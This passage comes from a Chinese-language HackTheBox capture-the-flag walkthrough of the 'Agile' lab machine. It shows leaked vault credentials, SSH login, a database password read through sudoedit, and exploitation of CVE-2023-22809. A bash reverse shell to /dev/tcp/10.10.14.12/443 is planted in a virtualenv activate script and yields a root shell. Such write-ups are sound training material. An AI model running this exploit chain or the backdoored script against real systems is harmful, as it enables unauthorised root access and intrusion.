        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav w-100 justify-content-end">
                <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                
                <li class="nav-item"><a class="nav-link" href="/vault">Vault</a></li>
                
                <li class="nav-item"><a class="nav-link" href="/vault/export" target="_blank" rel="noopener noreferrer">Export</a></li>
                
                <li class="nav-item"><a class="nav-link" href="/account/logout">Logout</a></li>
                
            </ul>
        </div>
    </div>
</nav>

    

    <div class="main_content">
        

    <div class="container">
        <div class="row">
            <div class="col-sm-1"></div>
            <div class="col-sm-10">
                <div class="spacer30"></div>
                <h1 class="vault-title">
                    <img src="/static/img/vault.png" alt="vault">
                    Welcome to your vault
                    <img src="/static/img/vault.png" alt="vault">
                </h1>
                <div class="spacer30"></div>
                <table class="table table-striped table-hover">
    <thead>
        <tr>
            <th></th>
            <th scope="col" width="30%">Site</th>
            <th scope="col" width="30%">Username</th>
            <th scope="col" width="30%">Password</th>
        </tr>
    </thead>
    <tbody hx-target="closest tr" hx-swap="outerHTML swap:.25s">
        
            <tr class="password-row">
    <td>
        <a hx-get="/vault/edit_row/1" hx-include="closest tr"><i class="fas fa-edit"></i></a>
        <a hx-delete="/vault/delete/1"><i class="fa-solid fa-trash"></i></a>
    </td>
    <td>agile</td>
    <td>edwards</td>
    <td>d07867c6267dcb5df0af</td>
</tr>
        
            <tr class="password-row">
    <td>
        <a hx-get="/vault/edit_row/2" hx-include="closest tr"><i class="fas fa-edit"></i></a>
        <a hx-delete="/vault/delete/2"><i class="fa-solid fa-trash"></i></a>
    </td>
    <td>twitter</td>
    <td>dedwards__</td>
    <td>7dbfe676b6b564ce5718</td>
</tr>
        
        
        <tr class="add-password">
            <td colspan="4">
                <button hx-get="/vault/add_row" hx-swap="beforebegin swap:.25s" hx-target=".add-password" class="fade-me-out btn btn-primary" name="add_password">
                <i class="fas fa-plus-circle"></i> Add a password</button>
                <a class="btn btn-success" href="/vault/export" target="_blank" rel="noopener noreferrer" style="visibility: none;">
                    <i class="fa-solid fa-file-export"></i> Export</a>
                
                    
            </td>
        </tr>
        
    </tbody>
</table>
                <div class="spacer30"></div>
            </div>
            <div class="col-sm-1"></div>
        </div>
    </div>


    </div>

    <footer class="mt-auto">
        <div class="copyright">
            Copyright © <a href="/">superpass.htb</a>
        </div>
    </footer>
    
    <script src="/static/js/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="/static/js/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
    <script src="/static/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
    <script src="/static/js/htmx.min.js"></script>
    <script src="/static/js/_hyperscript.min.js"></script>
    

</body></html>
corum@agile:~$ 

36、是的，没有错，直接把呢个测试脚本里的代码给利用出来， 来查看会出现什么信息。

<td>agile</td>
<td>edwards</td>
<td>d07867c6267dcb5df0af</td>

<td>twitter</td>
<td>dedwards__</td>
<td>7dbfe676b6b564ce5718</td>

37、这里是发现了2个账号的密码，登录其中一个开始尝试。

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh edwards@10.10.11.203
edwards@10.10.11.203's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Thu Mar  2 10:28:51 2023 from 10.10.14.23
edwards@agile:~$ id
uid=1002(edwards) gid=1002(edwards) groups=1002(edwards)
edwards@agile:~$

38、这里发现，可以调到另一个用户的sudo权限

edwards@agile:~$ ls -la
total 32
drwxr-x--- 5 edwards edwards 4096 Feb  8  2023 .
drwxr-xr-x 5 root    root    4096 Feb  8  2023 ..
lrwxrwxrwx 1 root    root       9 Feb  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 edwards edwards  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 edwards edwards 3771 Jan  6  2022 .bashrc
drwx------ 2 edwards edwards 4096 Feb  8  2023 .cache
drwxr-xr-x 3 edwards edwards 4096 Feb  8  2023 .config
drwx------ 3 edwards edwards 4096 Feb  8  2023 .local
-rw-r--r-- 1 edwards edwards  807 Jan  6  2022 .profile
edwards@agile:~$ 
edwards@agile:~$ sudo -l 
[sudo] password for edwards: 
Matching Defaults entries for edwards on agile:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User edwards may run the following commands on agile:
    (dev_admin : dev_admin) sudoedit /app/config_test.json
    (dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
edwards@agile:~$ 

39、执行利用

edwards@agile:~$ sudo -u dev_admin sudoedit /app/config_test.json
sudo: sudoedit doesn't need to be run via sudo
sudo: /app/config_test.json unchanged
edwards@agile:~$ 

{
    "SQL_URI": "mysql+pymysql://superpasstester:VUO8A2c2#3FnLq3*a9DX1U@localhost/superpasstest"
}


edwards@agile:~$ sudo -u dev_admin sudoedit /app/app-testing/tests/functional/creds.txt
sudo: sudoedit doesn't need to be run via sudo
sudo: /app/app-testing/tests/functional/creds.txt unchanged
edwards@agile:~$ 

40、上面是发现了一些账号密码，但是根据引导，还是发现了一些途径的

41、那就是查看sudo的版本

edwards@agile:~$ sudo -V
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9
edwards@agile:~$ 

42、搜索漏洞

sudo 1.9.9 exploit github

CVE-2023-22809

43、开始执行利用

EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin -g dev_admin /app/config_test.json


head /app/venv/bin/activate
# This file must be used with "source bin/activate" *from bash*
# you cannot run it directly
bash -c 'bash -i >& /dev/tcp/10.10.14.12/443 0>&1'

deactivate () {
    # reset old environment variables
    if [ -n "${_OLD_VIRTUAL_PATH:-}" ] ; then
        PATH="${_OLD_VIRTUAL_PATH:-}"
        export PATH
        unset _OLD_VIRTUAL_PATH



edwards@agile:~$ ls -lh /app/venv/bin
total 1.4M
-rw-r--r-- 1 root dev_admin 8.9K Sep 30 08:51 Activate.ps1
-rw-rw-r-- 1 root dev_admin 2.0K Sep 30 08:51 activate
-rw-r--r-- 1 root dev_admin  902 Sep 30 08:51 activate.csh
-rw-r--r-- 1 root dev_admin 2.0K Sep 30 08:51 activate.fish
-rwxrwxr-x 1 root root       213 Sep 30 08:51 flask
-rwxr-xr-x 1 root root       222 Jan 24  2023 gunicorn
-rwxrwxr-x 1 root root       226 Sep 30 08:51 pip
-rwxrwxr-x 1 root root       226 Sep 30 08:51 pip3
-rwxrwxr-x 1 root root       226 Sep 30 08:51 pip3.10
-rwxrwxr-x 1 root root       226 Sep 30 08:51 py.test
-rwxrwxr-x 1 root root       226 Sep 30 08:51 pytest
lrwxrwxrwx 1 root root         7 Sep 30 08:51 python -> python3
lrwxrwxrwx 1 root root        16 Sep 30 08:51 python3 -> /usr/bin/python3
lrwxrwxrwx 1 root root         7 Sep 30 08:51 python3.10 -> python3
-rwxrwxr-x 1 root root      1.3M Jan 23  2023 uwsgi
edwards@agile:~$ 

edwards@agile:~$ EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin /app/config_test.json 
sudoedit: --: Permission denied
2 files to edit
sudoedit: /app/config_test.json unchanged
edwards@agile:~$ 

44、到这里就获取到了反弹shell了，并读取到最终的flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.203] 40908
bash: cannot set terminal process group (2794): Inappropriate ioctl for device
bash: no job control in this shell
root@agile:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@agile:~# cat /root/root.txt
cat /root/root.txt
42721be4ede62508404ba6007c390820
root@agile:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/532